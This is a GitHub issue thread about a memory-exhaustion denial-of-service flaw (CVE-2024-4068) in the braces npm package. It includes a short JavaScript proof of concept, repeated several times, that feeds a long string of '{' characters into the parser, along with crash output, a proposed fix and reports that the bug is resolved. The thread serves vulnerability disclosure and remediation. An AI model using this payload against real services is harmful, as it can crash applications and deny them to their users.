Comments (23)
Current code right now will throw from code in the repository:
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
with:
Testing with 1 repeats...
/Users/coderaiser/braces/lib/parse.js:39
throw new SyntaxError(`Input length (${input.length}), exceeds max characters (${max})`);
^
SyntaxError: Input length (90000), exceeds max characters (65536)
Anyways if we decrease repeats
multiplier to 9000
it will crash node.js:
Regex executed in 1.643s.
Testing with 3 repeats...
<--- Last few GCs --->
[79448:0x128008000] 9091 ms: Scavenge 3643.7 (4107.5) -> 3643.7 (4107.5) MB, pooled: 939 MB, 9.21 / 0.00 ms (average mu = 0.129, current mu = 0.081) allocation failure;
Possible solution, as mentioned @cichelero would be to limit count of unique symbols with an option maxSymbols
: 2092bd1#diff-97a844a3a73131d1102031801050b31c823b42a40b8cdcf84b693ebb14463149
In this case we will se:
Testing with 1 repeats...
/Users/coderaiser/braces/lib/validate-input.js:10
throw SyntaxError(`To many symbols '${value}'. Maximum: ${maxSymbols} allowed. Received: ${count}`);
^
SyntaxError: To many symbols '{'. Maximum: 1024 allowed. Received: 9000
at module.exports.validateInput (/Users/coderaiser/braces/lib/validate-input.js:10:15)
at parse (/Users/coderaiser/braces/lib/parse.js:40:3)
It can be override with an option according to user needs, but can have reasonable defaults.
from braces.
Same here. Waiting for a solution.
from braces.
I have the same issue - my builds are being blocked by Blackduck due to this vulnerability.
from braces.
PoC:
const braces = require('braces');
const maxRepeats = 1;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
from braces.
Some refs:
https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727
https://learn.snyk.io/lesson/redos
from braces.
That's not enough information to provide a useful response. Please provide a detailed explanation of the vulnerability, and examples of how it would be exploited.
from braces.
That's fair. But I don't think the information is public accessible. Here is the quote from the report:
Technical Description
The flaw occurs in the parse function of the parse.js file. There is no limitation on the number of "imbalanced braces" processed. This allows a crafted input consisting of many { braces to cause the parser to enter a loop and continuously allocate heap memory without freeing any. Eventually a large enough input of these braces will cause an application crash via memory exhaustion.
There is a link to checkmarx. But the link is also gated.
from braces.
We'll respond once you or someone else is willing to provide the information I requested above. A link to another source doesn't answer my question.
That said, if you are allowing your users to submit regular expressions in a web form (brace patterns compile to regular expressions as is explained in several places in the readme), and you are using those regular expressions to perform operations on your server, you might have bigger problems than this library.
There is no way to guarantee that users will create safe regular expressions, even if we check "star height". See https://en.wikipedia.org/wiki/Star_height_problem.
from braces.
https://www.cve.org/CVERecord?id=CVE-2024-4068
from braces.
https://devhub.checkmarx.com/cve-details/CVE-2024-4068/
from braces.
@jonschlinkert please find more details+steps (kudos to Mário Teixeira)
Link
Summary
The NPM package micromatch is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything, which can cause the application to hang or slow down. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to its greedy matching.
Product
This vulnerability affects all versions of the NPM package micromatch.
Impact
This vulnerability can cause the application to hang or slow down, resulting in a Denial of Service.
Steps To Reproduce
Install micromatch with “npm”:
npm install --save micromatch
Create a poc.js file with the following code:
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Execute the proof-of-concept file with node poc.js.
Expected Result:
When executing the proof-of-concept, observe how the response becomes slower on each iteration. If you change the braces { on the payload variable to another character, such as a, the script should execute immediately.
Remediation
A [fix was merged](https://github.com/micromatch/micromatch/commit/81e4d93b2c7a32d290337c0b2a2102e1b584b423) in the pattern matching. However, further testing shows the issue still persists.
from braces.
Hello all our releases are blocked by this. Can you please help us here @jonschlinkert ?
from braces.
Same issue
from braces.
Same issue too
from braces.
Same issue here as well. Everything is blocked by this issue. Can you please help us, @jonschlinkert ?
from braces.
Looks like braces
not maintained at all, better to use glob, if you use fast-glob
, or globby
.
from braces.
braces
it's used as a Transitive Dependency of http-proxy-middleware
from braces.
Any update on this? I see there are two PRs for fixes out there.
from braces.
3.0.3 is coming this weekend.
@paulmillr Was 3.0.3 released?
from braces.
+1 to that. I see the fix is merged but I don't see any new version available in NPM.
from braces.
Read this #37 (comment)
from braces.
sorry didn't mean to close this, hit enter when I thought it was focused on something else. but I'll keep it locked.
from braces.
Resolved by #40
from braces.
Related Issues (20)
- Fails to expand Windows paths with brackets HOT 8
- Request: Remove or make optional result property on output array HOT 2
- Update snapdragon HOT 7
- Update split-string HOT 1
- Regular Expression Denial of Service vulnerability detected HOT 1
- Expand-braces test cases failed when upgrading braces from v1.8.5 to v2.3.2 HOT 2
- "Regular Expression Denial of Service" Vulnerability thrown despite package update HOT 5
- 1 vulnerability required manual review and could not be updated HOT 1
- 3.0.1 has .DS_Store inside HOT 10
- documentation: "keepEscaping" is missing HOT 5
- npm run dev HOT 1
- Zero-padding not supported in compiled output HOT 4
- Braces with a single value are not expanded HOT 4
- feature request: remove extra space HOT 2
- Braces may be vulnerable to DoS attack through snapdragon HOT 20
- CWE-400 | Uncontrolled resource consumption HOT 11
- Add CI/CD workflow to .github folder
- braces Uncontrolled resource consumption HOT 1
- Memory exhaustion issue in version 3.0.2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from braces.